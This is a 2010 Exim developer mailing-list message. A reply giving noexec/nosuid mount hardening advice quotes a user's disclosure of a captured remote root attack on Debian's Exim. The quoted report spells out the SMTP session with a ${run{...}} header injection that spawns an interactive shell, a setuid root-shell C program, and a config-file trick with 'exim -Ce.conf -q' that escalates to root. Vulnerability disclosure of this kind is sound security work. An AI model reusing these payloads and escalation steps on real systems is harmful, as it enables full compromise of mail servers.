[exim-dev] Remote root vulnerability in Exim

Thu Dec 9 04:34:39 UTC 2010

Sergey Kononenko wrote:
> Hi,
>
> While investigating security break in the network of my company,

Not just Exim. And I am not convinced it is actually vulnerable.

But get the basics right first:

'Do your own due diligence' research this for yourself, consider applying as 
modified to suit your OS, eg: your /dev and fs will certainly differ from mine:

FreeBSD example:

/dev/ufs/6011var	/var    ufs     rw,noexec,nosuid	2 2

OpenBSD example:

/dev/wd0d		/var 	ffs	rw,nodev,noexec,nosuid	1 2

Either way, there should be nothing on /var needful of being executable.
Ergo failed attack vector.

QED

See also whatever Linux uses that is equivalent to *BSD 'securelevel', so these 
mounts (nor a host of OTHER things) cannot be altered on a running system.

HTH,

Bill Hacker

> I've
> captured (by tcpdump) sequence of successful remote root attack through
> Exim. It was Exim from Debian Lenny (exim4-daemon-light 4.69-9). I
> didn't find email of current maintainer of Exim, so I've decided to
> write to this mailing lists. I don't want to publish all details of
> attack before developers can investigate and fix vulnerability.
> So I ask Exim maintainers to contact me and I will send them complete
> captured sequence of attack.
> Here I can put brief sequence of attack:
>
> EHLO mail.domain.com
> MAIL FROM:<orderruc0e at somedomain.com>
> RCPT TO:<postmaster at targetdomain.com>
> DATA
> MAILbombhdr0001: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0
> ....
> MAILbombhdr0054: M4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0mbM4iLB0m
> HeaderX: ${run{/bin/sh -c 'exec /bin/sh -i<&3>&0 2>&0'}}${run{/bin/sh -c 'exec /bin/sh -i<&4>&0 2>&0'}}........
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> ..........
> about 700000 the same strings
> ..........
> MAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbombMAILbomb
> MAILbombMAILb
> .
> MAIL FROM:<orderruc0e at somedomain.com>
> RCPT TO:<postmaster at targetdomain.com>
>
> after that attacker gets shell with id of user Debian-exim and cwd
> in /var/spool/exim4
> then it put file there file setuid with trivial execution of root shell:
> int main(int argc, char *argv[])
> {
>          setuid(0);
>          setgid(0);
>          setgroups(0, NULL);
>          execl("/bin/sh", "sh", NULL);
> }
>
> and create another file e.conf with following content:
> spool_directory = ${run{/bin/chown
> root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4/setuid}}
>
> the he runs:
> exim -Ce.conf -q
>
> and gets suid bit on /var/spool/exim4/setuid
> everything else is trivial.
>
> I haven't reproduced remote part of attack, but escalation from Debian-exim to
> root works also at exim4-daemon-light 4.72-2 from Debian Squeeze.
>
> With best regards,
> Sergey Kononenko.
>
>